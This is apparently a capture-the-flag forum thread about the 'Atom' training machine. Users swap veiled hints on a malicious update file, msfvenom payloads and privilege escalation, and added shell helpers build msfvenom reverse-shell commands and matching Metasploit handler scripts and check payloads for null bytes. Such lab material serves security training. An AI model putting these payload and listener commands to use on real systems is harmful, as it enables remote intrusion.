Official Atom Discussion

What is foothold?
r****, s**, or anything else?

Hi guys, I'm not sure if I'm on the right path to get the normal user (is it based on the y… file?). Please PM me if you have time.

@dylvie said:

Sorry, but I'm unable to catch the admin encrypted password with r***-cli. Any help please?

Can someone please PM me with a nudge on the foothold for this machine? Thanks in advance.

I've read a PDF, I've read a web page, I've seen the exploit, but I can't put the pieces together to create the right .**l file. :frowning:

Shooted. :stuck_out_tongue: DM for any help. :slight_smile:

I am completely stuck. I have created my l*****.y** file, uploaded it where it needs to go, I can see the server request my exe, and then nothing. Tried a million different shells and modifications to my .y** file. Any nudges? Feel free to PM.

@s00ner said:

I am completely stuck. I have created my l*****.y** file, uploaded it where it needs to go, I can see the server request my exe, and then nothing. Tried a million different shells and modifications to my .y** file. Any nudges? Feel free to PM.

Try to use a m********r payload created with msfvenom.

Try to use a m********r payload created with msfvenom.

That's what I've been trying (among other payloads) with no luck so far.

*edit: I figured it out. I was missing a flag in msfvenom the whole time.

Took me forever to get the initial foothold since I was trying to copy an article a bit too much. Getting to root was relatively smooth after I fixed how I was asking for information from the other service. Feel free to message me for a nudge!

So my listener is picking up the connection after pushing the .y*, but there's no response after that :confused: Anyone else run into this?
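The symptom in the post above (the listener sees a connection, then nothing) and the earlier "I was missing a flag in msfvenom" comment are both consistent with a mismatch between the payload and the listener, so here is a small helper for checking that pairing. This is an added example, not code from the thread or from the box; the payload names, LHOST/LPORT values and file names are assumptions for illustration. The one fact it relies on is how Metasploit names payloads: a staged payload has a "/" between stage and stager (windows/x64/meterpreter/reverse_tcp), a stageless one uses "_" (windows/x64/meterpreter_reverse_tcp). A staged payload connects back and then waits for the handler to send the stage; a plain nc listener never sends it, and multi/handler only sends it when its PAYLOAD matches the binary exactly.

```sh
# Added example (not from the thread): match an msfvenom payload to the
# listener that can actually serve it. Names, hosts and ports are assumed.

# "staged" if the component before the stager name is a stage
# (meterpreter, shell, ...), otherwise "stageless".
payload_kind() {
  name=$1
  rest=${name%/*}      # everything before the last "/"
  prev=${rest##*/}     # the component just before the stager name
  case "$prev" in
    meterpreter|shell|vncinject|dllinject|upexec|custom|patchupmeterpreter|patchupdllinject)
      echo staged ;;
    *)
      echo stageless ;;
  esac
}

# msfvenom command line for a Windows exe; an encoder is only added when
# a fifth argument (e.g. x64/xor) is given.
msfvenom_cmd() {
  payload=$1 lhost=$2 lport=$3 out=$4 enc=${5:-}
  cmd="msfvenom -p $payload LHOST=$lhost LPORT=$lport -f exe -o $out"
  if [ -n "$enc" ]; then
    cmd="$cmd -e $enc"
  fi
  echo "$cmd"
}

# msfconsole resource script for a handler whose PAYLOAD matches the
# binary; a mismatch here produces the same "connection, then nothing".
handler_rc() {
  payload=$1 lhost=$2 lport=$3
  printf 'use exploit/multi/handler\nset PAYLOAD %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n' \
    "$payload" "$lhost" "$lport"
}

# Which listener is sufficient for a given payload.
listener_for() {
  if [ "$(payload_kind "$1")" = staged ]; then
    echo "multi/handler with PAYLOAD $1 (nc will not work)"
  else
    echo "multi/handler with PAYLOAD $1, or nc -lvnp PORT"
  fi
}
```

Usage: `handler_rc windows/x64/meterpreter/reverse_tcp 10.10.14.5 4444 > handler.rc` and then `msfconsole -r handler.rc`; generate the binary with the output of `msfvenom_cmd` using the same payload name. When switching to a stageless payload to test with nc, regenerate the exe, since the two binaries are different.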

Growing increasingly frustrated with this box. I checked with several people who have gained a foothold on what to do, and the method I'm employing seems to be correct (using the l*****.y***). Just like @3xxu5, I can see the requests coming into my server, but no response. Tried multiple payloads, multiple methods and even several computers; none work.

Any help with this box would be greatly appreciated. Perhaps I'm missing something… DM me if you think you can help.

Rooted!! That was the hardest medium box I have ever done… The user was quite obvious after the right Google search, though, but the root was a pain.

Initial foothold/User

  • Portable Document Format files can give you a lot of information
  • Sometimes following exactly what you see may not be useful… Play with it a bit… See where the real vulnerability is

Root

  • Go back to your scansā€¦See what services may use passwords.
  • If you download a movie, where would it be saved?

Hope these hints help you a bit. If you need help, DM me. I will try to get you on track.

Finally got user… this took SO much fiddling for me. I knew exactly what the exploit was, but all these different little details were killing me.

Rooted !

User: basic scanning and enumeration will tell you what to do and what to look for;
you will find something that will give you some information to go on with.

Root: look for the installed applications/application files and the open ports;
connect these two and you may find a way.

DM me for nudges

Finally rooted! User was honestly a lot harder than root IMO, since the steps to it are pretty vague.

User/foothold: Enumerate like you usually would; at some point you should stumble across something that will vaguely point you in the right direction. Now do some Google-fu. If you're like me, make sure not to be lazy at reading and researching; you'll only waste your time if you copy something without understanding it.

Root: Enumerate the target machine as usual. You might stumble across something that will give you déjà vu. If not, look at what's being used on the machine and what ports are open, and google some stuff again. Once you connect the dots, privesc is pretty straightforward and is the easier part of this box IMO.

After a painfully long time I finally rooted it. A lot of it has to do with the fact that this is the first Windows box I've attempted in months, but it's still fairly difficult if you're unaware of what you're supposed to be looking for.

Tips for user: This one came to me fairly quickly, not sure if it was blind luck or what, but it's fairly easy to come by during your usual enumeration checklist. It may seem like a far reach to begin with, but a bit of googling will show you exactly what you need. In my case it was the first search result.

Tips for root: Honestly, without a sanity check from a helpful user I probably would've ignored this or left it until last. As previous people have mentioned, this service is sending outbound connections; that information tied with a short winPEAS search will hopefully give you all you need. It may take you a hot minute to figure out what to do with what you find from that service, but enumerating some common places in the user folder will lead you to your answer.

Hello everyone,

I'm stuck on the foothold and would appreciate some help… I have my .y** file and an .e**. I can see my file getting downloaded on the server, but then nothing happens.
I'm using mvm to generate the payload and mi/h***r to catch the revshell. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports; I don't know what to do anymore :neutral:
(I'm using the flags -p, -f, -o (and -e when encoding).)

Would any of you know what could be the cause?

Thank you and happy hacking!

Hi,

I just got user and I was having the same issue as you with the rev shell not happening. It ended up being something in the name of the file that needs to be included for the exploit to work. If you found the blog about this vulnerability, please check it again and you will find out what it is that you are missing. Well, that was the issue in my case.

If still stuck let me know.

Pepe

@Netpal said:

Hello everyone,

I'm stuck on the foothold and would appreciate some help… I have my .y** file and an .e**. I can see my file getting downloaded on the server, but then nothing happens.
I'm using mvm to generate the payload and mi/h***r to catch the revshell. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports; I don't know what to do anymore :neutral:
(I'm using the flags -p, -f, -o (and -e when encoding).)

Would any of you know what could be the cause?

Thank you and happy hacking!

When getting the foothold, you may have to play with the .**l file a bit. Don't just follow the PoC. Understand what the real vulnerability is. Then make your own exploit. Remember what a "null byte" is and that you have to remove bytes like it.

If you get stuck DM me.
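The last hint above mentions null bytes, and an earlier post mentions trying msfvenom with and without encoders. The usual way to get rid of forbidden bytes is msfvenom's `-b` option (for example `-b '\x00'`), which makes the encoder avoid them; what practitioners then want is a check that the output really contains none. Below is such a check as an added example; it is not code from the thread and it does not say which bytes matter for this box. Note the caveat: a finished .exe always contains NULs in its headers and padding, so this is only meaningful for raw shellcode (`-f raw`) or for a blob you embed yourself. The sample file is constructed inline.

```sh
# Added example (not from the thread): verify that a raw payload contains
# none of the bytes the encoder was told to avoid. Bytes are given as
# two-digit hex (00, 0a, 0d); the sample below is constructed for the demo.

# Print the zero-based offset of every forbidden byte in FILE.
# Usage: bad_byte_offsets FILE HEX [HEX ...]
bad_byte_offsets() {
  file=$1; shift
  pat=$(printf '%s\n' "$@" | tr 'A-Z' 'a-z' | paste -s -d '|' -)
  # od -v prints every byte (no "*" for repeated lines); tr/sed turn the
  # dump into one hex byte per line so awk's NR gives the offset.
  od -An -v -tx1 "$file" | tr -s ' \n' '\n' | sed '/^$/d' |
    awk -v pat="^($pat)$" '$0 ~ pat { print NR-1 }'
}

# Number of forbidden bytes found; 0 means the blob is clean.
bad_byte_count() {
  bad_byte_offsets "$@" | wc -l | tr -d ' '
}

# Constructed sample: 90 90 00 31 c0 0d 0a c0 (one NUL, one CR, one LF).
make_sample() {
  printf '\220\220\000\061\300\015\012\300' > "$1"
}
```

Usage after `msfvenom ... -b '\x00\x0a\x0d' -f raw -o shell.bin`: run `bad_byte_count shell.bin 00 0a 0d` and expect 0; a non-zero count with the offsets from `bad_byte_offsets` tells you the encoder did not do what you asked (wrong `-b` quoting, or an encoder that cannot avoid that byte set).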